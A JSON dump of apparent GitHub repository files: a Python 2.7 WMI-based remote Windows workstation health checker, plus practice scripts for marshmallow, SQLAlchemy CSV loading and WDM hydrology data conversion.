[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "b89102b6e627ad317d64e1b52f22a3e37fd2c557", "content_id": "ce64ae9d89b312b11d881f9b7af88351116889ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 28, "license_type": "no_license", "max_line_length": 27, "num_lines": 1, "path": "/README.md", "repo_name": "MattPlahuta/computer-health-in-python", "src_encoding": "UTF-8", "text": "# computer-health-in-python\n" }, { "alpha_fraction": 0.5266630053520203, "alphanum_fraction": 0.540948748588562, "avg_line_length": 49.381866455078125, "blob_id": "dca95527a99f3283a4db82ce6c5949875a007f5f", "content_id": "6afd87fa6e305ff684189ada00775f1e8017dbd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18340, "license_type": "no_license", "max_line_length": 209, "num_lines": 364, "path": "/PC_Health.py", "repo_name": "MattPlahuta/computer-health-in-python", "src_encoding": "UTF-8", "text": "# Python 2.7 program \n# Remote Workstation health\n# 11/29/2017\n# by Matthew R. Plahuta\n\nfrom subprocess import check_output\nimport wmi\nimport socket\nimport win32com.client\nimport os, time\n\nclass PcHealth:\n \"\"\"\n This Class was designed to gather important workstation health information and will aid you in troubleshooting and \n will result in a faster soulution for our clients.\n \"\"\"\n def __init__(self, hostname):\n self.ava_code = { 1 : 'Other', 2 : 'Unknown', 3 : 'Running / Full Power', 4 : 'Warning', 5 : 'In Test', 6 : 'Not Applicable',\n 7 : 'Power Off', 8 : 'Off Line', 9 : 'Off Duty', 10 : 'Degraded', 11 : 'Degraded', 12 : 'Install Error', \n 13 : 'Power Save - Unknown ', 14 : 'Power Save - Low Power Mode', 15 : 'Power Save - Standby', 16 : 'Power Cycle ', 17 : \n 'Power Save - Warning', 18 : 'Paused', 19 : 'Not Ready', 20 : 'Not Configured', 21 : 'Quiesced'}\n\n self.conf_er_code = { 0 : 'This device is working properly.', 1 : 'This device is not configured correctly.', 2 : 'Windows cannot load the driver for this device.', \n 3 : 'The driver for this device might be corrupted, or your system may be running low on memory or other resources.', 4 : \n 'This device is not working properly. One of its drivers or your registry might be corrupted.', 5 : 'The driver for this device needs a resource that Windows cannot manage.',\n 6 : 'The boot configuration for this device conflicts with other devices.', 7 : 'Cannot filter.', 8 : 'The driver loader for the device is missing.',\n 9 : 'This device is not working properly because the controlling firmware is reporting the resources for the device incorrectly.', \n 10 : 'This device cannot start.', 11 : 'This device failed.', 12 : 'This device cannot find enough free resources that it can use.', \n 13 : 'Windows cannot verify this device\\'s resources.', 14 : 'This device cannot work properly until you restart your computer.', \n 15 : 'This device is not working properly because there is probably a re-enumeration problem.', 16 : 'Windows cannot identify all the resources this device uses.',\n 17 : 'This device is asking for an unknown resource type.', 18 : 'Reinstall the drivers for this device.', 19 : 'Failure using the VxD loader.', \n 20 : 'Your registry might be corrupted.', 21 : 'System failure: Try changing the driver for this device. If that does not work, see your hardware documentation. Windows is removing this device.', \n 22 : 'This device is disabled.', 23 : 'System failure: Try changing the driver for this device. If that doesn\\'t work, see your hardware documentation.', \n 24 : 'This device is not present, is not working properly, or does not have all its drivers installed.', 25 : 'Windows is still setting up this device.', \n 26 : 'Windows is still setting up this device.', 27 : 'This device does not have valid log configuration.', 28 : 'The drivers for this device are not installed.', \n 29 : 'This device is disabled because the firmware of the device did not give it the required resources.', 30 : 'This device is using an Interrupt Request (IRQ) resource that another device is using.',\n 31 : 'This device is not working properly because Windows cannot load the drivers required for this device.' }\n\n self.prt_state = { 0 : 'Idle', 1 : 'Paused', 2 : 'Error', 3 : 'Pending Deletion', 4 : 'Paper Jam', 5 : 'Paper Out', 6 : 'Manual Feed', \n 7 : 'Paper Problem', 8 : 'Offline', 9 : 'I/O Active', 10 : 'Busy', 11 : 'Printing', 12 : 'Output Bin Full', 13 : 'Not Available', 14 : 'Waiting', 15 : 'Processing', \n 16 : 'Initialization', 17 : 'Warming Up', 18 : 'Toner Low', 19 : 'No Toner', 20 : 'Page Punt', 21 : 'User Intervention Required', 22 : 'Out of Memory', 23 : 'Door Open', \n 24 : 'Server_Unknown', 25 : 'Power Save' }\n \n self.hostname = hostname\n\n try:\n self.c = wmi.WMI(hostname) # Attempts to create a WMI session with remote computer\n objWMIService = win32com.client.Dispatch(\"WbemScripting.SWbemLocator\")\n self.objSWbemServices = objWMIService.ConnectServer(hostname,\"root\\cimv2\")\n except Exception as e:\n #print e\n print \"Can't resolve the host or workstation is offline.\"\n x = raw_input(\"Press Enter to exit\")\n exit(1)\n m = self.main() # Calls the main function\n\n def last_build(self):\n \"\"\" This function is used to get the last build date on the remote workstation \"\"\"\n print \"---------------------------------\"\n print \"Basic information for workstation:\"\n print \"---------------------------------\"\n file_list = []\n try:\n directory = \"\\\\\\\\\"+(self.hostname)+\"File location\" # Grabs the name of file in build_results folder\n for i in os.listdir(directory):\n a = os.stat(os.path.join(directory, i))\n file_list.append([time.ctime(a.st_atime)])\n print \"Build Completed: \" + str(file_list)\n except Exception as e:\n #print e\n print \"Can not find build results.\"\n\n def os_system_info(self):\n \"\"\" This function is used to get basic operating system infomation for a remote workstation\"\"\"\n try: \n for os in self.c.Win32_OperatingSystem(): # Grabs operating system info from remote host\n os = os.Caption\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\")\n for objItem in colItems:\n if objItem.Model != None:\n pc_modle = str(objItem.Model)\n print os\n print pc_modle\n print self.hostname.upper()\n except Exception as e:\n #print e\n print \"Unable to get operating system information.\"\n\n def system_uptime(self):\n \"\"\" This function is used to gather System Uptime information for a remote workstation\"\"\"\n try:\n secs_up = int([uptime.SystemUpTime for uptime in self.c.Win32_PerfFormattedData_PerfOS_System()][0]) # Grabs PC Uptime in seconds\n minutes_up = secs_up /60\n hours_up = secs_up / 3600 # Transfers the Uptime in seconds to days, hours, and minutes\n days_up = hours_up / 24\n if minutes_up > 0:\n day = days_up\n hour = hours_up - (day * 24)\n minute = minutes_up - (hours_up * 60)\n print \"Machine Uptime: \", day, \"days\", hour, \"hours\", minute, \"minutes\"\n except Exception as e:\n #print e\n print \"Unable to pull uptime information.\"\n print\n\n def network_info(self):\n \"\"\" This function gathers network information for a remote workstation\"\"\"\n print \"-------------------\"\n print \"Network Information:\"\n print \"-------------------\"\n try:\n for interface in self.c.Win32_NetworkAdapterConfiguration (IPEnabled=1): # Grabs and prints IP and MAC information\n print \"MAC: \" + interface.MACAddress\n print \"IPv4: \" + interface.IPAddress[0]\n #print \"IPv6: \" + interface.IPAddress[1] \n except Exception as e:\n #print e\n print \"Can not get \" + self.hostname + \"'s IP's or MAC Address.\"\n \n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_NetworkAdapter\") # Grabs information from the netwok adaptor\n for objItem in colItems:\n if objItem.AdapterType != None:\n x = str(objItem.AdapterType)\n if x == 'Ethernet 802.3':\n if objItem.Description != None:\n print \"NIC: \" + str(objItem.Description)\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print self.conf_er_code[num]\n if objItem.Speed != None:\n speed = str(objItem.Speed)\n if speed == '1000000000':\n print \"Speed: 1GB\"\n elif objItem.Speed == '1000000':\n print \"Speed: 100MB\"\n else:\n print \"Speed: \" + speed + \" bps\"\n print \n except Exception as e:\n #print e\n print \"Unable to gather information from the network adapter.\" \n\n def mem_cpu(self):\n \"\"\" This function is used to print Memory and CPU information for a remote workstation\"\"\"\n print \"--------------------\"\n print \"Memory and CPU Usage:\"\n print \"--------------------\"\n try: \n for i in self.c.Win32_ComputerSystem(): ### Try uptting all the Try statments in one\n totalMem = int(i.TotalPhysicalMemory)\n totalMem = totalMem / 1000000000\n pct_in_use = int([mem.PercentCommittedBytesInUse for mem in self.c.Win32_PerfFormattedData_PerfOS_Memory()][0])\n utilizations = [cpu.LoadPercentage for cpu in self.c.Win32_Processor()]\n utilization = int(sum(utilizations) / len(utilizations)) # avg all cores/processors\n print \"Total memory: \", totalMem, \"GB\"\n print \"Percent of free memory: \", pct_in_use, \"%\"\n print \"Percent of CPU utilization: \", utilization, \"%\"\n except Exception as e:\n #print e\n print \"Unable to pull memory and CPU information.\"\n print\n\n def motherboard_info(self):\n \"\"\" This function is used to gather motherboard information for a remote workstation\"\"\"\n print \"-----------\"\n print \"Motherboard: \"\n print \"-----------\"\n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_BaseBoard\")\n for objItem in colItems:\n if objItem.SerialNumber != None:\n print \"SerialNumber: \" + str(objItem.SerialNumber)\n if objItem.Status != None:\n print \"Status: \" + str(objItem.Status)\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_MotherboardDevice\")\n for objItem in colItems:\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n except Exception as e:\n #print e\n print \"Unable to get Motherboard information.\"\n print\n\n def drive_size(self):\n \"\"\" This function is used to gather drive size for a remote workstation\"\"\"\n print \"----------\"\n print \"Drive Size: \"\n print \"----------\"\n try:\n for d in self.c.Win32_LogicalDisk():\n drive = str(d.Caption)\n if d.FreeSpace == None:\n free = 0\n else:\n free = float(d.FreeSpace)\n free = float(\"{0:.2f}\".format(free / 1073741824))\n if d.Size == None:\n size = 0\n else:\n size = int(d.size)\n size = size / 1000000000\n print \"Disk: \", drive, \" Free GB: \", free, \" Total GB: \", size\n except Exception as e:\n #print e\n print \"Unable to get Drive Size information.\"\n print\n\n def drive_info(self):\n \"\"\" This function is used to gather drive information for a remote workstation\"\"\"\n print \"-----------\"\n print \"Disk Drives: \"\n print \"-----------\"\n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_DiskDrive\")\n for objItem in colItems:\n if objItem.Model != None:\n print \"Model: \" + str(objItem.Model)\n if objItem.Name != None:\n print \"Name: \" + str(objItem.Name)\n if objItem.InterfaceType != None:\n print \"InterfaceType: \" + str(objItem.InterfaceType)\n if objItem.Status != None:\n print \"Status: \" + str(objItem.Status)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print self.conf_er_code[num]\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n print\n except Exception as e:\n #print e\n print \"Unable to get disk drive information.\"\n print\n\n def fan_info(self):\n \"\"\" This function is used to gather fan information for a remote workstation\"\"\"\n print \"---------------\"\n print \"Fan information: \"\n print \"---------------\"\n try:\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_Fan\")\n for objItem in colItems:\n if objItem.Name != None:\n print \"Name: \" + str(objItem.Name)\n if objItem.Availability != None:\n num = int(objItem.Availability)\n print \"Availability: \" + self.ava_code[num]\n if objItem.Status != None:\n print \"Status: \" + str(objItem.Status)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print self.conf_er_code[num]\n except Exception as e:\n #print e\n print \"Unable to get Fan information.\"\n print\n\n def usb_info(self):\n \"\"\" This function is used to gather USB information for a remote workstation\"\"\"\n print \"---------------------\"\n print \"USB ports on computer:\"\n print \"---------------------\"\n try:\n for usb in self.c.InstancesOf(\"Win32_UsbHub\"): # Runs a loop to get the names of each USB on the remote host\n print 'Name: ' + usb.Name\n except Exception as e:\n #print e\n print \"Unable to gather USB information.\"\n print\n\n def printer_info(self):\n \"\"\"This funtion is used to gather printer information from a remote workstation\"\"\"\n colItems = self.objSWbemServices.ExecQuery(\"SELECT * FROM Win32_Printer\")\n print \"-------------------\"\n print \"Printer Information:\"\n print \"-------------------\"\n print\n try:\n for objItem in colItems:\n strList = \" \"\n try:\n print \"CapabilityDescriptions: \",\n for objElem in objItem.CapabilityDescriptions :\n strList = strList + str(objElem) + \", \"\n except:\n strList = strList + 'null'\n print strList\n if objItem.Caption != None:\n print \"Caption: \" + str(objItem.Caption)\n if objItem.DriverName != None:\n print \"DriverName: \" + str(objItem.DriverName)\n if objItem.ConfigManagerErrorCode != None:\n num = int(objItem.ConfigManagerErrorCode)\n print \"Error Status: \" + self.conf_er_code[num] \n if objItem.PrinterState != None:\n num = int(objItem.PrinterState)\n print \"Print State: \" + self.prt_state[num]\n if objItem.Shared != None:\n print \"Shared: \" + str(objItem.Shared)\n if objItem.ShareName != None:\n print \"ShareName: \" + str(objItem.ShareName)\n if objItem.SpoolEnabled != None:\n print \"SpoolEnabled: \" + str(objItem.SpoolEnabled)\n print\n except Exception as e:\n #print e\n print \"Unable to get printer information\"\n\n def socket_connect(self):\n \"\"\" This function is used to attempt a socket creation for a remote workstation\"\"\"\n print \"-----------------\"\n print \"Socket Connection:\"\n print \"-----------------\"\n print\n try: \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Calls socket\n s.connect((self.hostname, 3389)) # Connects to socket on port 3389\n\n print \"Socket connection successfully, should be able to RDP.\" \n s.close() \n except Exception as e:\n #print e \n print \"Socket failed to connect.\" \n print\n\n def ping_results(self):\n \"\"\" This function is used to attempt a ping to a remote workstation\"\"\"\n print \"----\"\n print \"Ping:\"\n print \"----\"\n try:\n socket.gethostbyname(self.hostname) # Uses socket to resolve host \n output = check_output([\"ping\", self.hostname]) # Runs ping for Windows\n print output\n except Exception as e:\n #print e\n print \"Unable to Ping.\"\n\n def main(self):\n \"\"\" Runs all functions to gather the data for a remote workstation\"\"\"\n self.last_build()\n self.os_system_info()\n self.system_uptime()\n self.network_info()\n self.mem_cpu()\n self.motherboard_info()\n self.drive_size()\n self.drive_info()\n self.fan_info()\n self.usb_info()\n self.printer_info()\n self.socket_connect()\n self.ping_results()\n x = raw_input(\"Press Enter to exit\")\n\nos.system('cls') # Clears the screen\nhostname = raw_input('Enter the computer hostname: ') # Provides input for hostname to gather information\npc = PcHealth(hostname) # Calls The class \n" } ]
2
ShyGuyPy/Workflow_py
https://github.com/ShyGuyPy/Workflow_py
6385f2f58ecfbd69a3918c85389b281320cc4087
73a534584ac84d8dde35d19086b264cae8b0c17e
cb247c30480fa9eb84870089169b22d463a928fb
refs/heads/master
2023-06-24T13:49:02.544628
2023-06-14T19:16:14
2023-06-14T19:16:14
186,460,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6721581816673279, "alphanum_fraction": 0.6738055944442749, "avg_line_length": 28.634145736694336, "blob_id": "fae44b040cce7ea0bb6e490afaf45de5736f68de", "content_id": "c5a5c1699f4abb58d9cd316a594c2688a51c786a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 102, "num_lines": 41, "path": "/marshmallow_practice.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "t#stepping through an interesting marshmallow tutorial\n#https://www.youtube.com/watch?v=S7Fh5XnuhPU\n\nfrom marshmallow import Schema, fields, pprint, post_load\n\nclass Player(object):\n def __init__(self, name, level, my_class):\n self.name = name\n self.level = level\n self.my_class = my_class\n\n def __repr__(self):\n return '{} is a level {} {}'.format(self.name, self.level, self.my_class)\n\nclass PlayerSchema(Schema):\n name = fields.String()\n level = fields.Integer()\n my_class = fields.String()\n\n #this automatically instantiates the Player class\n @post_load\n def create_player(self,data):\n return Player(**data)\n #this is same as 'return Player(name, level, my_class)\n\ninput_dict= {}\n\ninput_dict['name'] = input(\"Name thyself: \")\ninput_dict['level'] = input(\"what level have you achieved...be honest: \")\ninput_dict['my_class'] = input(\"What is your class?: \")\n\n#the_player = Player(name=input_dict['name'], level=input_dict['level'], my_class=input_dict['class'])\n\nschema = PlayerSchema()\n#result = schema.dump(the_player)\nresult = schema.load(input_dict)\n\npprint(result.data)\npprint(input_dict['my_class'])\n#pprint(the_player)\nprint(result.errors)" }, { "alpha_fraction": 0.5037540197372437, "alphanum_fraction": 0.5291383862495422, "avg_line_length": 24.42727279663086, "blob_id": "bf83432d05c9cf2133ba57021047c4c6b6b0f44e", "content_id": "7aa6c266b70bf98697f9ce248bc79ea6678fcc32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2797, "license_type": "no_license", "max_line_length": 96, "num_lines": 110, "path": "/Aqueduct_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from numpy import genfromtxt\nfrom time import time\nfrom datetime import datetime\nfrom sqlalchemy import Column, Integer, Float, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\ndef Load_Data(file_name):\n data = genfromtxt(file_name, delimiter=',', skip_header=1, converters={0: lambda s: str(s)})\n return data.tolist()\n\nBase = declarative_base()\n\n\n\nclass Data(Base):\n __tablename__ = 'Aqueduct_test'\n __table_args__ = {'sqlite_autoincrement': True}\n id = Column(Integer, primary_key=True, nullable=False)\n year = Column(Integer)\n month = Column(Integer)\n res = Column(Float)\n solids = Column(Integer)#Bool\n NTU = Column(Integer)#Bool\n org_ml = Column(Integer)#Bool\n MPN_100ml = Column(Integer)#Bool\n MPN_100ml_1 = Column(Integer)#Bool\n LosR = Column(Float)\n Silica = Column(Float)\n Ca = Column(Float)\n Mg = Column(Float)\n Ca_Mg = Column(Float)\n NO3 = Column(Float)\n NO3_USGS = Column(Float)\n Cl2 = Column(Float)\n Na = Column(Float)\n SO4 = Column(Float)\n K = Column(Float)\n pH = Column(Float)\n Alk = Column(Float)\n Hard = Column(Float)\n Nhard = Column(Float)\n C_USGSTemp = Column(Float)\n F_USGS = Column(Float)\n Temp = Column(Float)\n MD_Precip_inch_mon = Column(Float)\n MD_Temp_F = Column(Float)\n\nif __name__ == \"__main__\":\n t = time()\n\n engine = create_engine('sqlite:///data/Aqueduct_test.db')\n Base.metadata.create_all(engine)\n\n session = sessionmaker()\n session.configure(bind=engine)\n s = session()\n\n\ntry:\n\n file_name = \"data/Reservoir_intake_retweaked.csv\"\n data = Load_Data(file_name)\n\n print(data)\n\n\n for i in data:\n record = Data(**{\n 'year' : i[1],\n 'month' : i[2],\n 'res' : i[3],\n 'solids' : i[4],\n 'NTU' : i[5],\n 'org_ml' : i[6],\n 'MPN_100ml' : i[7],\n 'MPN_100ml_1' : i[8],\n 'LosR' : i[9],\n 'Silica' : i[10],\n 'Ca' : i[11],\n 'Mg' : i[12],\n 'Ca_Mg' : i[13],\n 'NO3' : i[14],\n 'NO3_USGS' : i[15],\n 'Cl2' : i[16],\n 'Na' : i[17],\n 'SO4' : i[18],\n 'K' : i[19],\n 'pH' : i[20],\n 'Alk' : i[21],\n 'Hard' : i[22],\n 'Nhard' : i[23],\n 'C_USGSTemp' : i[24],\n 'F_USGS' : i[25],\n 'Temp' : i[26],\n 'MD_Precip_inch_mon' : i[27],\n 'MD_Temp_F' : i[28]\n })\n s.add(record)\n\n s.commit()\n print(\"success\")\nexcept:\n s.rollback()\n print(\"no good\")\nfinally:\n s.close()\n print(\"connection closed\")\nprint(\"Time elapsed: \" + str(time() - t) + \" s.\")\n" }, { "alpha_fraction": 0.5998803973197937, "alphanum_fraction": 0.6172248721122742, "avg_line_length": 21.013158798217773, "blob_id": "b0aa2967441c6615b8754a3995c0e1a0a2a1c63e", "content_id": "502dd26855f5ab589466457614be795d7a3a5a1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1672, "license_type": "no_license", "max_line_length": 104, "num_lines": 76, "path": "/wdm_scraps.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "#unused parts of wdm code\n\n\n#print(data_df)\n\n#print(data_df.index.month)\n\ndatetime_values = list(data_df.index.values) #.index.array)#\ncheck2 = data_df.iloc[7,0]\ndtr2 = datetime_values[0:5]\n\ndf_shape = data_df.shape\n\n\ndatetime_values_df = pd.DataFrame(datetime_values)\n\ndatetime_values_df.columns=[\"Date_Time\"]\n\n#print(datetime_values_df)\n\n#add rows to dataframe\n# data_df =pd.concat([data_df, datetime_values_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n# )], sort=False)\n\n\n\n\n#-------------formatting data\n\n#disable warning\npd.options.mode.chained_assignment = None # default='warn'\n\n\n\n\n#data_df['Datetime'] = []\n#\n# data_df['year'] = df[]\n\n\n# count = 0\n# for i in datetime_values:#dtr2:\n# #datetime object to string\n# dt = str(i)\n# # grabbing select parts of the datetime object for each entry in the data\n# year = dt[-29:-25]\n# month = dt[-24:-22]\n# day = dt[-21:-19]\n# hour = dt[-18:-16]\n#\n# #then assign each to respective column\n# data_df.iloc[count, data_df.columns.get_loc('year')] = year\n# data_df.iloc[count, data_df.columns.get_loc('month')] = month\n# data_df.iloc[count, data_df.columns.get_loc('day')] = day\n# data_df.iloc[count, data_df.columns.get_loc('hour')] = hour\n# #print(count)\n#\n# # data_df.iloc[count,3] = month\n# # data_df.iloc[count,4] = day\n# # data_df.iloc[count,5] = hour\n# count +=1\n\n# data_df.to_csv(output_folder +\"/\" + title + \".csv\")\n\n\n#print(dtr2)\n#print(df_shape)\n#print(datetime_values)\n#print(datetime_values_df)\n#print(data_df)\n\n# for col in data_df.columns:\n# print(col)\n\n#print(data_df.axes)\n#print(count)" }, { "alpha_fraction": 0.6119944453239441, "alphanum_fraction": 0.6227335929870605, "avg_line_length": 48.11643981933594, "blob_id": "42762f9bbc2f2dbe199a8c1cd2d7588208c120e7", "content_id": "a49d16adacb3484459adb3feb9466d9eae4d88c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7170, "license_type": "no_license", "max_line_length": 111, "num_lines": 146, "path": "/wdm.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from wdmtoolbox import wdmtoolbox\nimport glob\nimport pandas as pd\nfrom sys import platform\n\nif platform == \"linux\" or platform == \"linux2\":\n # linux\n pass\nelif platform == \"darwin\":\n # OS X\n\n # this is the directory where the raw wdm files are placed\n source_dir_met = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/input/met\"\n source_dir_prad = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/input/prad\"\n\n # create object containing all files in for met and prad\n allFiles1 = glob.glob(source_dir_met + \"/*met*.wdm*\")\n allFiles2 = glob.glob(source_dir_prad + \"/*prad*.wdm*\")\n\n # our file destintion\n output_folder = r\"/Users/lukevawter/Desktop/Python_ICPRB/FEWS_WDM/output\"\n #print(\"mac os\")\nelif platform == \"win32\":\n # Windows...\n\n #this is the directory where the raw wdm files are placed\n source_dir_met = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\input\\met\"\n source_dir_prad = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\input\\prad\"\n\n #create object containing all files in for met and prad\n allFiles1 = glob.glob(source_dir_met + \"/*met*.wdm*\")\n allFiles2 = glob.glob(source_dir_prad+ \"/*prad*.wdm*\")\n\n #our file destintion\n output_folder = r\"C:\\Users\\icprbadmin\\Documents\\Python_Scripts\\Workflow_py\\output\"\n #print(\"win32 os\")\n\n#------------iterate through the met files---#\nfor file in allFiles1:\n\n\n#------------1000.PET-------------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1000)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n #output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".PET\")\n#-----------------------------------#\n\n#------------1001.DPT-----------------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1001)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".DPT\")\n#-----------------------------------#\n\n#----------------1002.WND--------------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1002)\n #add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df =pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n #then we add the values from the DatetimeIndex to the appropriate column\n data_df['year']= data_df.index.year\n data_df['month']= data_df.index.month\n data_df['day']= data_df.index.day\n data_df['hour']= data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".WND\")\n#----------------------------------#\n\n#--------------------1003.RAD------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1003)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".RAD\")\n#-----------------------------------#\n\n#--------------------1004.TMP------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 1004)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n #output the data to the output directory with the required file extension\n data_df.to_csv(output_folder +\"/\" + title + \".TMP\")\n#------------------------------------#\n#------------------------------------#\n\n#----------iterate through the prad files-------#\nfor file in allFiles2:\n\n#-------------------2000.PRC------#\n # takes specific indexes from the right to include only the unique identification code\n title = file[-10:-4]\n # use wdmtoolbox function to assign data to a pandas dataframe\n data_df = wdmtoolbox.extract(file, 2000)\n # add rows to dataframe to accommodate year, month, day and hour we will pull from our datetimeindex object\n data_df = pd.concat([data_df, pd.DataFrame(columns=(\"year\", \"month\", \"day\", \"hour\")\n )], sort=False)\n # then we add the values from the DatetimeIndex to the appropriate column\n data_df['year'] = data_df.index.year\n data_df['month'] = data_df.index.month\n data_df['day'] = data_df.index.day\n data_df['hour'] = data_df.index.hour\n # output the data to the output directory with the required file extension\n data_df.to_csv(output_folder + \"/\" + title + \".PRC\")\n # ------------------------------------#" }, { "alpha_fraction": 0.5003384947776794, "alphanum_fraction": 0.5267434120178223, "avg_line_length": 18.10389518737793, "blob_id": "e128d317f242be862becc3424a764b810ea25ce5", "content_id": "b8fec0caab4c96950daecd5c5fc7471548465b61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1477, "license_type": "no_license", "max_line_length": 65, "num_lines": 77, "path": "/test_2021.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "# print(\"it's been a while...\")\n#\n# test = (1,2,3)\n#\n# #print(test)\n#\n# def test_function(array):\n#\n# print(array)\n#\n# test_function(test)\n#\n# class test_class:\n# def __init__(self, test_value):\n# self.value = test_value\n#\n# test_instantiation = test_class(42)\n#\n# print(test_instantiation.value)\n\n# def test_func(n):\n# product=1\n# my_sum = 0\n# difference = 0\n# n_str = str(n)\n# for i in n_str:\n# product = int(i) * product\n# # print(product)\n# my_sum = int(i) + my_sum\n# # print(sum)\n# difference = product - my_sum\n# # print(difference)\n# return difference\n\n # print(int(i) * i[+1])\n #print((n*n) - (n+n))\n#\n# test_val = test_func(123456)\n# print(test_val)\n\n\n\n# def binaryPatternMatching(pattern, s):\n# vowels = ('a','e','i','o','u','y')\n# match_count = 0\n#\n#\n# if len(pattern) == len(s):\n# same_length = True\n# for i in str(pattern):\n# #if (len(i) == len(str(s[pattern.index(i)]))):\n#\n#\n# if (int(i) == 0) & (s[pattern.index(i)] in vowels):\n# vowel_match = True\n# #print('vowel match')\n# elif (int(i) == 1) & (s[pattern.index(i)] not in vowels):\n# cons_match = True\n# #print('con match')\n# match_count += 1\n#\n# else:\n# match = match\n# #print('no match')\n# #print(match_count)\n# return(match_count)\n#\n#\n#\n# result = binaryPatternMatching('1011','team')\n#\n# print(result)\n\nmat = [0,1,0,0],\n[1,1,1,0],\n[0,1,1,1],\n[0,0,1,0]\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 28, "blob_id": "522414cbf13cd3bed731c8cc2a7ae12bd9e254d2", "content_id": "789b4e20b257bf00387c2952ea06c339d109358a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 60, "num_lines": 3, "path": 